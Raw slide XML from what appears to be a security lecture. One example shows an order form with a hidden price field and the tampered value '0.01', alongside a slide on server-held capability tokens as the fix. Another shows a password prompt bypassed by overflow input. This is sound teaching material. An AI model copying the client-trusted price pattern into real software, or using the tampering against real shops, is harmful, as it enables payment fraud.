              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>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85" name="pay.php"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17898245" y="3922261"/>
            <a:ext cx="2524761" cy="968376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="635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pay.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Ex: Online ordering"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530149" y="507593"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40449986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8" name="if(pay == yes &amp;&amp; price != NULL)…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536596" y="5033995"/>
            <a:ext cx="12608583" cy="46132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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if(pay == yes &amp;&amp; price != NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	bill_creditcard(price);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	deliver_socks();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="The corresponding backend processing"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6080471" y="3498770"/>
            <a:ext cx="1222305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The corresponding backend processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10905169" y="5118597"/>
            <a:ext cx="2007711" cy="723223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26340"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>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 name="Ex: Online ordering"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530149" y="507593"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164347149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0"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2" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4415005" y="4519710"/>
            <a:ext cx="15545396" cy="77882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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;form action=“submit_order” method=“GET”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>The total cost is $5.50. Confirm order?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“hidden” name=“price” value=“5.50”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“submit” name=“pay” value=“yes”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“submit” name=“pay” value=“no”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="What’s presented to the user"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768276" y="2999090"/>
            <a:ext cx="8847448"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What’s presented to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="value=“0.01”"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15310175" y="8356170"/>
            <a:ext cx="3996681" cy="77787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4200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>value=“0.01”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413251" y="8358096"/>
            <a:ext cx="15972270" cy="723223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26340"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>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97" name="Client can change the value!"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15534771" y="4960865"/>
            <a:ext cx="4912322" cy="1584470"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 30771"/>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t>Client can change the value!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Ex: Online ordering"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530149" y="507593"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89071513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495"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="495"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="497"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="497"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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animBg="1" advAuto="0"/>
      <p:bldP spid="497" grpId="0"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9" name="Solution: Capabilities"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4543937" y="702270"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Server maintains trusted state (while client maintains the rest)…"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4543937" y="3280624"/>
            <a:ext cx="15609095" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>maintains</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> state</a:t>
            </a:r>
            <a:r>
              <a:t> (while client maintains the rest)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Server stores intermediate state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Send a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>capability</a:t>
            </a:r>
            <a:r>
              <a:t> to access that state to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>references the capability</a:t>
            </a:r>
            <a:r>
              <a:t> in subsequent responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Capabilities should be large, random numbers</a:t>
            </a:r>
            <a:r>
              <a:t>, so that they are hard to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>To prevent illegal access to the state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1408043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0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50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50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5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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3922359" y="8504404"/>
            <a:ext cx="3613142" cy="1270001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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37" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13238359" y="2999413"/>
            <a:ext cx="5407280" cy="1362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000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248501" y="5253525"/>
            <a:ext cx="14903385" cy="6594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846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>print “Password?” to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>read input into variable X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if X matches the password then log in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>else print “Failed” to the screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286108" y="8566316"/>
            <a:ext cx="1453947" cy="1146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6600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>X =</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4135712" y="8747052"/>
            <a:ext cx="19544011" cy="90477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4800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Overflow!!!!! 3.log in                               </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1862398" y="6622413"/>
            <a:ext cx="2301368" cy="1362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000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473081" y="610739"/>
            <a:ext cx="7624785" cy="5470783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="1191830"/>
            <a:ext cx="3867278" cy="1057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6000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="2188438"/>
            <a:ext cx="6571298" cy="981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5500">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Overflow!!!!! 3.log in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="3151813"/>
            <a:ext cx="5830764" cy="1057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6000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Access granted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793896" y="5361795"/>
            <a:ext cx="1333501" cy="755412"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32000"/>
              <a:gd name="adj2" fmla="val 107597"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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47" name="Shape 347"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
